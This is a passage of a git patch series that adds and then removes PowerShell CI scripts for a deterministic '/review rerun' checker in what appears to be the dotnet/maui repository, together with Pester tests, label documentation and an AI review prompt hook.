$($newCommits.Count)") + $lines.Add('') + + if ($evidenceComments.Count -gt 0) { + $lines.Add('### New comments') + $lines.Add('') + $lines.Add('| Kind | Author | Created | Body |') + $lines.Add('|---|---|---|---|') + foreach ($comment in $evidenceComments) { + $author = if ($comment.user) { [string]$comment.user.login } else { '' } + $createdAt = (Get-ObjectDate 
$comment 'created_at').ToString('u') + $lines.Add("| $($comment.kind) | $(Format-MarkdownCell $author) | $createdAt | $(Format-MarkdownCell $comment.body) |") + } + $lines.Add('') + } + + if ($newCommits.Count -gt 0) { + $lines.Add('### New commits') + $lines.Add('') + $lines.Add('| SHA | Author | Date | Message |') + $lines.Add('|---|---|---|---|') + foreach ($commit in $newCommits) { + $sha = if ($commit.sha) { ([string]$commit.sha).Substring(0, [Math]::Min(7, ([string]$commit.sha).Length)) } else { '' } + $author = if ($commit.commit -and $commit.commit.author) { [string]$commit.commit.author.name } else { '' } + $date = Get-CommitDate $commit + $message = if ($commit.commit -and $commit.commit.message) { ([string]$commit.commit.message -split "`n")[0] } else { '' } + $lines.Add("| $sha | $(Format-MarkdownCell $author) | $(if ($date) { $date.ToString('u') } else { '' }) | $(Format-MarkdownCell $message) |") + } + $lines.Add('') + } + + if ($evidenceComments.Count -eq 0 -and $newCommits.Count -eq 0 -and -not $headDiffers) { + $lines.Add('No new deterministic activity was found since the checkpoint.') + $lines.Add('') + } + + return ($lines -join "`n") +} + function Resolve-RerunEligibility { param( [object[]]$Comments, @@ -276,6 +428,30 @@ if ($pr.state -ne 'open') { throw "PR #$PRNumber is not open (state: $($pr.state))" } +if ($ContextOutputPath) { + $context = New-RerunContextMarkdown ` + -Comments $comments ` + -Commits $commits ` + -CurrentHeadSha $pr.head.sha ` + -CurrentLabels $labels + $contextDir = Split-Path -Parent $ContextOutputPath + if ($contextDir) { + New-Item -ItemType Directory -Force -Path $contextDir | Out-Null + } + $context | Set-Content -LiteralPath $ContextOutputPath -Encoding UTF8 + Write-Host "Wrote rerun context: $ContextOutputPath" + if ($env:GITHUB_OUTPUT) { + "context_output_path=$ContextOutputPath" >> $env:GITHUB_OUTPUT + } + if ($CurrentCommentId -eq 0 -and -not $ApplyLabel) { + exit 0 + } +} + +if ($CurrentCommentId -eq 0) { + 
throw "CurrentCommentId is required unless only writing ContextOutputPath." +} + $result = Resolve-RerunEligibility ` -Comments $comments ` -Commits $commits ` diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 575dff836e2b..377b11e720d4 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -1355,6 +1355,35 @@ $gateStatusForPrompt = switch ($gateResult) { default { "Gate ❌ FAILED — tests did NOT behave as expected." } } +$rerunContextInstruction = "" +$rerunContextPath = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/rerun/context.md" +$rerunContextScript = Join-Path $ScriptsDir "Resolve-RerunEligibility.ps1" +if (Test-Path $rerunContextScript) { + try { + Write-Host "Generating deterministic rerun context..." -ForegroundColor Cyan + & pwsh -NoProfile -File $rerunContextScript ` + -PRNumber $PRNumber ` + -Owner 'dotnet' ` + -Repo 'maui' ` + -ContextOutputPath $rerunContextPath + if ($LASTEXITCODE -eq 0 -and (Test-Path $rerunContextPath)) { + Write-Host " ✅ rerun context: $rerunContextPath" -ForegroundColor Green + $rerunContextInstruction = @" + +## Deterministic rerun context + +Before pre-flight, read ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/rerun/context.md`` if it exists. This file is generated without AI and lists new comments/commits since the latest AI Summary or previous ``/review rerun`` checkpoint. + +When the file has new activity, explicitly include a "New activity since previous AI Summary" subsection in ``pre-flight/content.md`` and prioritize that delta when deciding what changed since the previous review. 
+"@ + } else { + Write-Host " ⚠️ rerun context generation exited with code $LASTEXITCODE" -ForegroundColor Yellow + } + } catch { + Write-Host " ⚠️ rerun context generation failed: $_" -ForegroundColor Yellow + } +} + # Build regression test instruction for try-fix candidates $regressionTestInstruction = "" if ($risksData -and $regressionTests -and $regressionTests.Count -gt 0) { @@ -1388,6 +1417,7 @@ Generate alternative fix candidates for PR #$PRNumber using an iterative expert- ## Phase 1 — Pre-Flight (context only) Use the pr-review skill's pre-flight phase to gather context about the issue and PR. Do NOT modify code. Write summary to ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/pre-flight/content.md``. +$rerunContextInstruction ## Phase 2 — Iterative Try-Fix loop For each candidate, follow this cycle: From 16321bd70513ba038a02734c22718dc41e297e3c Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Mon, 1 Jun 2026 15:25:39 +0200 Subject: [PATCH 28/34] Move rerun implementation out of review UI PR Keep the /review rerun instruction in the AI Summary text, but remove the command implementation, rerun context generation, ready-for-rerun label changes, and related tests from this PR so they can live in the dedicated scanner PR. 
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/docs/agent-labels.md | 8 +- .../Resolve-RerunEligibility.Tests.ps1 | 232 --------- .github/scripts/Resolve-RerunEligibility.ps1 | 492 ------------------ .github/scripts/Review-PR.ps1 | 30 -- .github/scripts/post-ai-summary-comment.ps1 | 2 +- .github/scripts/shared/Update-AgentLabels.ps1 | 22 +- .github/workflows/review-trigger.yml | 56 +- 7 files changed, 11 insertions(+), 831 deletions(-) delete mode 100644 .github/scripts/Resolve-RerunEligibility.Tests.ps1 delete mode 100644 .github/scripts/Resolve-RerunEligibility.ps1 diff --git a/.github/docs/agent-labels.md b/.github/docs/agent-labels.md index 5793264ec9a9..d256bfc55425 100644 --- a/.github/docs/agent-labels.md +++ b/.github/docs/agent-labels.md @@ -41,14 +41,13 @@ Always applied on every completed agent run. |-------|-------|-------------|--------------| | `s/agent-reviewed` | 🔵 `#1565C0` | PR was reviewed by AI agent workflow (full 4-phase review) | Every completed agent run | -### Manual / Queue Labels +### Manual Label -Manual labels are applied by MAUI maintainers. Queue labels are applied by deterministic automation, not by AI. +Applied by MAUI maintainers, not by automation. | Label | Color | Description | Applied When | |-------|-------|-------------|--------------| | `s/agent-fix-implemented` | 🟣 `#7B1FA2` | PR author implemented the agent's suggested fix | Maintainer applies when PR author adopts agent's recommendation | -| `s/agent-ready-for-rerun` | 🟣 `#5319E7` | AI review has new PR activity and is ready for rerun | `/review rerun` finds new comments or commits after the latest AI Summary / previous rerun request | --- @@ -71,7 +70,7 @@ Review-PR.ps1 └── Non-fatal: errors warn but don't fail the workflow ``` -Most review outcome labels are applied from `Review-PR.ps1` Phase 4. 
The exception is `s/agent-ready-for-rerun`, which is applied by the deterministic `/review rerun` GitHub Action path after checking for new comments or commits. The rerun path does not use AI to decide whether the label applies. +Labels are applied exclusively from `Review-PR.ps1` Phase 4. No other script applies agent labels. This single-source design avoids label conflicts and simplifies debugging. ### How Labels Are Parsed @@ -140,7 +139,6 @@ is:pr label:s/agent-reviewed |------|---------| | `.github/scripts/shared/Update-AgentLabels.ps1` | Label helper module (all label logic) | | `.github/scripts/Review-PR.ps1` | Orchestrator that calls `Apply-AgentLabels` in Phase 4 | -| `.github/scripts/Resolve-RerunEligibility.ps1` | Deterministic `/review rerun` checker that can apply `s/agent-ready-for-rerun` | | `.github/skills/pr-review/SKILL.md` | Documents label system for the pr-review skill | ### Key Functions diff --git a/.github/scripts/Resolve-RerunEligibility.Tests.ps1 b/.github/scripts/Resolve-RerunEligibility.Tests.ps1 deleted file mode 100644 index e5ca621a5b15..000000000000 --- a/.github/scripts/Resolve-RerunEligibility.Tests.ps1 +++ /dev/null @@ -1,232 +0,0 @@ -BeforeAll { - . 
"$PSScriptRoot/Resolve-RerunEligibility.ps1" -PRNumber 1 -CurrentCommentId 1 - - function New-TestUser { - param( - [string]$Login = 'dev-user', - [string]$Type = 'User' - ) - - [pscustomobject]@{ - login = $Login - type = $Type - } - } - - function New-TestComment { - param( - [int64]$Id, - [string]$Body, - [string]$CreatedAt, - [string]$UpdatedAt = $CreatedAt, - [string]$Login = 'dev-user', - [string]$Type = 'User', - [string]$Kind = 'issue-comment' - ) - - [pscustomobject]@{ - id = $Id - kind = $Kind - body = $Body - created_at = $CreatedAt - updated_at = $UpdatedAt - user = New-TestUser -Login $Login -Type $Type - } - } - - function New-TestCommit { - param( - [string]$Sha, - [string]$Date - ) - - [pscustomobject]@{ - sha = $Sha - commit = [pscustomobject]@{ - author = [pscustomobject]@{ date = $Date } - committer = [pscustomobject]@{ date = $Date } - } - } - } - - function New-AISummaryBody { - param([string]$Sha = 'abcdef1') - - @" - - -## AI Review Summary - - -
-Review Sessions — click to expand -
- -"@ - } -} - -Describe 'Resolve-RerunEligibility' { - It 'rejects commands when no AI Summary exists' { - $comments = @( - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeFalse - $result.Reason | Should -Be 'no-ai-summary' - } - - It 'rejects a rerun command when there are no new comments or commits' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeFalse - $result.Reason | Should -Be 'no-new-comments-or-commits' - } - - It 'accepts a non-command comment after the latest AI Summary' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 2 -Body 'I pushed the requested update.' 
-CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeTrue - $result.Reason | Should -Be 'new-comment-after-ai-summary' - } - - It 'does not count repeated rerun commands as evidence' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 9 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeFalse - $result.Reason | Should -Be 'no-new-comments-or-commits' - } - - It 'accepts a non-command comment after the previous rerun command' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 8 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 9 -Body 'Follow-up detail after rerun request.' 
-CreatedAt '2026-05-31T09:50:00Z' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeTrue - $result.Reason | Should -Be 'new-comment-after-previous-rerun' - } - - It 'does not reuse old activity from before a previous rerun command' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 7 -Body 'Old follow-up before the first rerun.' -CreatedAt '2026-05-31T09:40:00Z' - New-TestComment -Id 8 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeFalse - $result.Reason | Should -Be 'no-new-comments-or-commits' - } - - It 'finds AI Summary content posted as a PR review' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' -Kind 'review' - New-TestComment -Id 2 -Body 'Follow-up after the review.' 
-CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeTrue - $result.Reason | Should -Be 'new-comment-after-ai-summary' - } - - It 'accepts a current head SHA that differs from the latest reviewed session' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody -Sha 'abcdef1') -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'fedcba9876543210' - - $result.Eligible | Should -BeTrue - $result.Reason | Should -Be 'new-head-commit' - } - - It 'accepts a commit after the previous rerun command' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 8 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - $commits = @( - New-TestCommit -Sha 'abcdef123' -Date '2026-05-31T09:50:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits $commits -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeTrue - $result.Reason | Should -Be 'new-commit-after-previous-rerun' - } - - It 'rejects bot rerun comments' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' -Login 'maui-bot' -Type 'Bot' - ) - - $result = Resolve-RerunEligibility -Comments $comments 
-Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeFalse - $result.Reason | Should -Be 'bot-comment' - } - - It 'is idempotent when ready-for-rerun label already exists' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' -CurrentLabels @('s/agent-ready-for-rerun') - - $result.Eligible | Should -BeTrue - $result.Reason | Should -Be 'label-already-present' - } - - It 'builds deterministic rerun context with new comments and commits' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 2 -Body 'New author context.' 
-CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 3 -Body '/review rerun' -CreatedAt '2026-05-31T09:50:00Z' - ) - $commits = @( - New-TestCommit -Sha 'fedcba9876543210' -Date '2026-05-31T09:48:00Z' - ) - - $context = New-RerunContextMarkdown -Comments $comments -Commits $commits -CurrentHeadSha 'fedcba9876543210' - - $context | Should -Match '# Rerun Context' - $context | Should -Match 'New non-command comments: 1' - $context | Should -Match 'New commits: 1' - $context | Should -Match '`s/agent-ready-for-rerun` present: false' - $context | Should -Match 'New author context' - $context | Should -Match 'fedcba9' - $context | Should -Not -Match '\| .*\/review rerun' - } -} diff --git a/.github/scripts/Resolve-RerunEligibility.ps1 b/.github/scripts/Resolve-RerunEligibility.ps1 deleted file mode 100644 index d388cd65cde1..000000000000 --- a/.github/scripts/Resolve-RerunEligibility.ps1 +++ /dev/null @@ -1,492 +0,0 @@ -#!/usr/bin/env pwsh -<# -.SYNOPSIS - Determines whether a /review rerun request should mark a PR ready for rerun. - -.DESCRIPTION - This script is intentionally deterministic: it never uses AI and never - inspects untrusted text semantically. A rerun is eligible only when there is - new PR activity after the previous AI Summary or previous /review rerun: - a new non-command comment, or a new commit. 
-#> - -param( - [Parameter(Mandatory = $true)] - [int]$PRNumber, - - [Int64]$CurrentCommentId = 0, - - [string]$Owner = 'dotnet', - [string]$Repo = 'maui', - - [string]$ContextOutputPath, - - [switch]$ApplyLabel -) - -$ErrorActionPreference = 'Stop' -$AISummaryMarker = '' -$ReadyForRerunLabel = 's/agent-ready-for-rerun' -$ReadyForRerunLabelDescription = 'AI review has new PR activity and is ready for rerun' -$ReadyForRerunLabelColor = '5319E7' - -function ConvertTo-DateTimeOffset { - param([Parameter(Mandatory = $true)]$Value) - - if ($Value -is [datetimeoffset]) { - return $Value - } - if ($Value -is [datetime]) { - return [datetimeoffset]$Value - } - return [datetimeoffset]::Parse([string]$Value, [Globalization.CultureInfo]::InvariantCulture, [Globalization.DateTimeStyles]::AssumeUniversal) -} - -function Test-RerunCommand { - param([string]$Body) - - return ([string]$Body).Trim() -match '(?i)^/review\s+rerun\s*$' -} - -function Get-ObjectDate { - param( - [Parameter(Mandatory = $true)]$Object, - [Parameter(Mandatory = $true)][string]$PropertyName - ) - - $value = $Object.$PropertyName - if ($null -eq $value) { - return $null - } - - return ConvertTo-DateTimeOffset $value -} - -function Get-LatestAISummaryComment { - param([object[]]$Comments) - - return @($Comments | - Where-Object { $_.body -and ([string]$_.body).Contains($AISummaryMarker) } | - Sort-Object @{ Expression = { Get-ObjectDate $_ 'updated_at' }; Descending = $true }, @{ Expression = { [Int64]$_.id }; Descending = $true } | - Select-Object -First 1) -} - -function Get-LatestRerunCommentBefore { - param( - [object[]]$Comments, - [Parameter(Mandatory = $true)][Int64]$CurrentCommentId - ) - - $current = @($Comments | Where-Object { [Int64]$_.id -eq $CurrentCommentId } | Select-Object -First 1) - if (-not $current) { - return $null - } - - $currentCreatedAt = Get-ObjectDate $current 'created_at' - return @($Comments | - Where-Object { - [Int64]$_.id -ne $CurrentCommentId -and - (Test-RerunCommand 
$_.body) -and - (Get-ObjectDate $_ 'created_at') -lt $currentCreatedAt - } | - Sort-Object @{ Expression = { Get-ObjectDate $_ 'created_at' }; Descending = $true }, @{ Expression = { [Int64]$_.id }; Descending = $true } | - Select-Object -First 1) -} - -function Get-LatestRerunComment { - param([object[]]$Comments) - - return @($Comments | - Where-Object { Test-RerunCommand $_.body } | - Sort-Object @{ Expression = { Get-ObjectDate $_ 'created_at' }; Descending = $true }, @{ Expression = { [Int64]$_.id }; Descending = $true } | - Select-Object -First 1) -} - -function Get-LatestReviewedSha { - param([string]$AISummaryBody) - - if ([string]::IsNullOrWhiteSpace($AISummaryBody)) { - return $null - } - - $matches = [regex]::Matches($AISummaryBody, '') - if ($matches.Count -eq 0) { - return $null - } - - return $matches[$matches.Count - 1].Groups[1].Value.ToLowerInvariant() -} - -function Test-CommentIsEvidence { - param( - [Parameter(Mandatory = $true)]$Comment, - [Parameter(Mandatory = $true)][Int64]$CurrentCommentId - ) - - if ([Int64]$Comment.id -eq $CurrentCommentId) { - return $false - } - if (Test-RerunCommand $Comment.body) { - return $false - } - if ($Comment.user -and $Comment.user.type -eq 'Bot') { - return $false - } - if ($Comment.user -and $Comment.user.login -match '(?i)^(maui-bot|github-actions)(\[bot\])?$') { - return $false - } - - return $true -} - -function Test-HasEvidenceCommentAfter { - param( - [object[]]$Comments, - [Parameter(Mandatory = $true)][datetimeoffset]$Checkpoint, - [Parameter(Mandatory = $true)][Int64]$CurrentCommentId - ) - - return [bool]@($Comments | Where-Object { - (Test-CommentIsEvidence -Comment $_ -CurrentCommentId $CurrentCommentId) -and - (Get-ObjectDate $_ 'created_at') -gt $Checkpoint - } | Select-Object -First 1) -} - -function Test-HasCommitAfter { - param( - [object[]]$Commits, - [Parameter(Mandatory = $true)][datetimeoffset]$Checkpoint - ) - - return [bool]@($Commits | Where-Object { - $date = $null - if ($_.commit 
-and $_.commit.committer -and $_.commit.committer.date) { - $date = ConvertTo-DateTimeOffset $_.commit.committer.date - } elseif ($_.commit -and $_.commit.author -and $_.commit.author.date) { - $date = ConvertTo-DateTimeOffset $_.commit.author.date - } - - $date -and $date -gt $Checkpoint - } | Select-Object -First 1) -} - -function Get-CommitDate { - param($Commit) - - if ($Commit.commit -and $Commit.commit.committer -and $Commit.commit.committer.date) { - return ConvertTo-DateTimeOffset $Commit.commit.committer.date - } - if ($Commit.commit -and $Commit.commit.author -and $Commit.commit.author.date) { - return ConvertTo-DateTimeOffset $Commit.commit.author.date - } - return $null -} - -function Test-HeadDiffersFromReviewedSha { - param( - [string]$CurrentHeadSha, - [string]$LatestReviewedSha - ) - - if ([string]::IsNullOrWhiteSpace($CurrentHeadSha) -or [string]::IsNullOrWhiteSpace($LatestReviewedSha)) { - return $false - } - - return -not $CurrentHeadSha.ToLowerInvariant().StartsWith($LatestReviewedSha.ToLowerInvariant()) -} - -function ConvertTo-RerunActivityItem { - param( - [Parameter(Mandatory = $true)]$Item, - [Parameter(Mandatory = $true)][string]$Kind - ) - - $createdAt = $Item.created_at - if ($Kind -eq 'review') { - $createdAt = $Item.submitted_at - } - - $updatedAt = $Item.updated_at - if ($null -eq $updatedAt) { - $updatedAt = $createdAt - } - - return [pscustomobject]@{ - id = [Int64]$Item.id - kind = $Kind - body = [string]$Item.body - created_at = $createdAt - updated_at = $updatedAt - user = $Item.user - } -} - -function Format-MarkdownCell { - param([string]$Value) - - if ([string]::IsNullOrWhiteSpace($Value)) { - return '' - } - - $singleLine = ($Value -replace '\r?\n', ' ').Trim() - if ($singleLine.Length -gt 180) { - $singleLine = $singleLine.Substring(0, 177) + '...' 
- } - - return ($singleLine -replace '\|', '\|') -} - -function New-RerunContextMarkdown { - param( - [object[]]$Comments, - [object[]]$Commits, - [string]$CurrentHeadSha, - [object[]]$CurrentLabels = @() - ) - - $latestSummary = Get-LatestAISummaryComment -Comments $Comments - $latestRerun = Get-LatestRerunComment -Comments $Comments - $checkpointRerun = if ($latestRerun) { Get-LatestRerunCommentBefore -Comments $Comments -CurrentCommentId ([Int64]$latestRerun.id) } else { $null } - $readyLabelPresent = @($CurrentLabels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0 - - $latestReviewedSha = if ($latestSummary) { Get-LatestReviewedSha -AISummaryBody $latestSummary.body } else { $null } - $summaryUpdatedAt = if ($latestSummary) { Get-ObjectDate $latestSummary 'updated_at' } else { $null } - - $checkpoint = $summaryUpdatedAt - $checkpointReason = if ($latestSummary) { 'latest AI Summary' } else { 'none' } - if ($checkpointRerun) { - $checkpointRerunCreatedAt = Get-ObjectDate $checkpointRerun 'created_at' - if (-not $checkpoint -or $checkpointRerunCreatedAt -gt $checkpoint) { - $checkpoint = $checkpointRerunCreatedAt - $checkpointReason = 'previous /review rerun' - } - } - - $evidenceComments = @() - if ($checkpoint) { - $evidenceComments = @($Comments | Where-Object { - (Test-CommentIsEvidence -Comment $_ -CurrentCommentId 0) -and - (Get-ObjectDate $_ 'created_at') -gt $checkpoint - } | Sort-Object @{ Expression = { Get-ObjectDate $_ 'created_at' }; Descending = $false }, @{ Expression = { [Int64]$_.id }; Descending = $false }) - } - - $newCommits = @() - if ($checkpoint) { - $newCommits = @($Commits | Where-Object { - $date = Get-CommitDate $_ - $date -and $date -gt $checkpoint - } | Sort-Object @{ Expression = { Get-CommitDate $_ }; Descending = $false }) - } - - $headDiffers = Test-HeadDiffersFromReviewedSha -CurrentHeadSha $CurrentHeadSha -LatestReviewedSha $latestReviewedSha - $lines = [System.Collections.Generic.List[string]]::new() - $lines.Add('# 
Rerun Context') - $lines.Add('') - $lines.Add('This file was generated deterministically before pre-flight. No AI was used to decide or summarize this context.') - $lines.Add('') - $lines.Add('## Checkpoint') - $lines.Add('') - if ($latestSummary) { - $lines.Add("- Latest AI Summary: $($latestSummary.kind) `#$($latestSummary.id)` updated $($summaryUpdatedAt.ToString('u'))") - } else { - $lines.Add('- Latest AI Summary: not found') - } - if ($latestRerun) { - $lines.Add("- Latest `/review rerun`: comment `#$($latestRerun.id)` created $((Get-ObjectDate $latestRerun 'created_at').ToString('u'))") - } else { - $lines.Add('- Latest `/review rerun`: not found') - } - if ($checkpointRerun) { - $lines.Add("- Previous `/review rerun` checkpoint: comment `#$($checkpointRerun.id)` created $((Get-ObjectDate $checkpointRerun 'created_at').ToString('u'))") - } - if ($checkpoint) { - $lines.Add("- Activity checkpoint: $checkpointReason at $($checkpoint.ToString('u'))") - } else { - $lines.Add('- Activity checkpoint: none') - } - $lines.Add("- Latest reviewed SHA: $(if ($latestReviewedSha) { $latestReviewedSha } else { 'unknown' })") - $lines.Add("- Current head SHA: $(if ($CurrentHeadSha) { $CurrentHeadSha } else { 'unknown' })") - $lines.Add("- Current head differs from latest reviewed SHA: $($headDiffers.ToString().ToLowerInvariant())") - $lines.Add("- ``$ReadyForRerunLabel`` present: $($readyLabelPresent.ToString().ToLowerInvariant())") - $lines.Add('') - $lines.Add('## New activity since checkpoint') - $lines.Add('') - $lines.Add("- New non-command comments: $($evidenceComments.Count)") - $lines.Add("- New commits: $($newCommits.Count)") - $lines.Add('') - - if ($evidenceComments.Count -gt 0) { - $lines.Add('### New comments') - $lines.Add('') - $lines.Add('| Kind | Author | Created | Body |') - $lines.Add('|---|---|---|---|') - foreach ($comment in $evidenceComments) { - $author = if ($comment.user) { [string]$comment.user.login } else { '' } - $createdAt = (Get-ObjectDate 
$comment 'created_at').ToString('u') - $lines.Add("| $($comment.kind) | $(Format-MarkdownCell $author) | $createdAt | $(Format-MarkdownCell $comment.body) |") - } - $lines.Add('') - } - - if ($newCommits.Count -gt 0) { - $lines.Add('### New commits') - $lines.Add('') - $lines.Add('| SHA | Author | Date | Message |') - $lines.Add('|---|---|---|---|') - foreach ($commit in $newCommits) { - $sha = if ($commit.sha) { ([string]$commit.sha).Substring(0, [Math]::Min(7, ([string]$commit.sha).Length)) } else { '' } - $author = if ($commit.commit -and $commit.commit.author) { [string]$commit.commit.author.name } else { '' } - $date = Get-CommitDate $commit - $message = if ($commit.commit -and $commit.commit.message) { ([string]$commit.commit.message -split "`n")[0] } else { '' } - $lines.Add("| $sha | $(Format-MarkdownCell $author) | $(if ($date) { $date.ToString('u') } else { '' }) | $(Format-MarkdownCell $message) |") - } - $lines.Add('') - } - - if ($evidenceComments.Count -eq 0 -and $newCommits.Count -eq 0 -and -not $headDiffers) { - $lines.Add('No new deterministic activity was found since the checkpoint.') - $lines.Add('') - } - - return ($lines -join "`n") -} - -function Resolve-RerunEligibility { - param( - [object[]]$Comments, - [object[]]$Commits, - [Parameter(Mandatory = $true)][Int64]$CurrentCommentId, - [string]$CurrentHeadSha, - [object[]]$CurrentLabels = @() - ) - - $current = @($Comments | Where-Object { [Int64]$_.id -eq $CurrentCommentId } | Select-Object -First 1) - if (-not $current) { - return [pscustomobject]@{ Eligible = $false; Reason = 'current-comment-not-found'; Label = $ReadyForRerunLabel } - } - - if (-not (Test-RerunCommand $current.body)) { - return [pscustomobject]@{ Eligible = $false; Reason = 'not-rerun-command'; Label = $ReadyForRerunLabel } - } - - if ($current.user -and ($current.user.type -eq 'Bot' -or $current.user.login -match '(?i)^(maui-bot|github-actions)(\[bot\])?$')) { - return [pscustomobject]@{ Eligible = $false; Reason = 
'bot-comment'; Label = $ReadyForRerunLabel } - } - - $latestSummary = Get-LatestAISummaryComment -Comments $Comments - if (-not $latestSummary) { - return [pscustomobject]@{ Eligible = $false; Reason = 'no-ai-summary'; Label = $ReadyForRerunLabel } - } - - if (@($CurrentLabels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0) { - return [pscustomobject]@{ Eligible = $true; Reason = 'label-already-present'; Label = $ReadyForRerunLabel } - } - - $summaryUpdatedAt = Get-ObjectDate $latestSummary 'updated_at' - $latestReviewedSha = Get-LatestReviewedSha -AISummaryBody $latestSummary.body - $previousRerun = Get-LatestRerunCommentBefore -Comments $Comments -CurrentCommentId $CurrentCommentId - $checkpoint = $summaryUpdatedAt - $checkpointReason = 'ai-summary' - if ($previousRerun) { - $previousRerunCreatedAt = Get-ObjectDate $previousRerun 'created_at' - if ($previousRerunCreatedAt -gt $checkpoint) { - $checkpoint = $previousRerunCreatedAt - $checkpointReason = 'previous-rerun' - } - } - - if ($checkpointReason -eq 'ai-summary' -and (Test-HeadDiffersFromReviewedSha -CurrentHeadSha $CurrentHeadSha -LatestReviewedSha $latestReviewedSha)) { - return [pscustomobject]@{ Eligible = $true; Reason = 'new-head-commit'; Label = $ReadyForRerunLabel } - } - - if (Test-HasEvidenceCommentAfter -Comments $Comments -Checkpoint $checkpoint -CurrentCommentId $CurrentCommentId) { - $reason = if ($checkpointReason -eq 'previous-rerun') { 'new-comment-after-previous-rerun' } else { 'new-comment-after-ai-summary' } - return 